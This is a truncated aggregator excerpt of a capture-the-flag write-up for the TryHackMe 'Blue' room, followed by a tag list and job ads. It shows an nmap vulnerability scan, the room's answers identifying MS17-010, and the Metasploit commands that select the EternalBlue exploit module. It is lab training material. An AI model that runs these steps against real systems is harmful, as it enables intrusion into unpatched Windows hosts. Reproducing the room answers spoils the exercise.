Feb. 14, 2024, 11:07 a.m. | Eslam Omar

System Weakness - Medium systemweakness.com

Hello floks, Today i want share writeup about how solve this room.

let’s start now.

Recon:

nmap -sV -sC 10.10.244.140 --script="vuln"
Q: How many ports are open with a port number under 1000?A: 3Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)A: ms17–010

Exploitation:

This exploit have module in ‘metasploit’ project, Let’s running ‘metasploit’.

msfconsole
search ms17_010

Now let’s use this module.

use exploit/windows/smb/ms17_010_eternalblue …

blue cybersecurity exploit hello machine metasploit nmap pentesting port ports project recon room running script share start thm thm-writeup today tryhackme under vuln vulnerable what is writeup

Information Security Engineers

@ D. E. Shaw Research | New York City

Technology Security Analyst

@ Halton Region | Oakville, Ontario, Canada

Senior Cyber Security Analyst

@ Valley Water | San Jose, CA

Senior - Penetration Tester

@ Deloitte | Madrid, España

Associate Cyber Incident Responder

@ Highmark Health | PA, Working at Home - Pennsylvania

Senior Insider Threat Analyst

@ IT Concepts Inc. | Woodlawn, Maryland, United States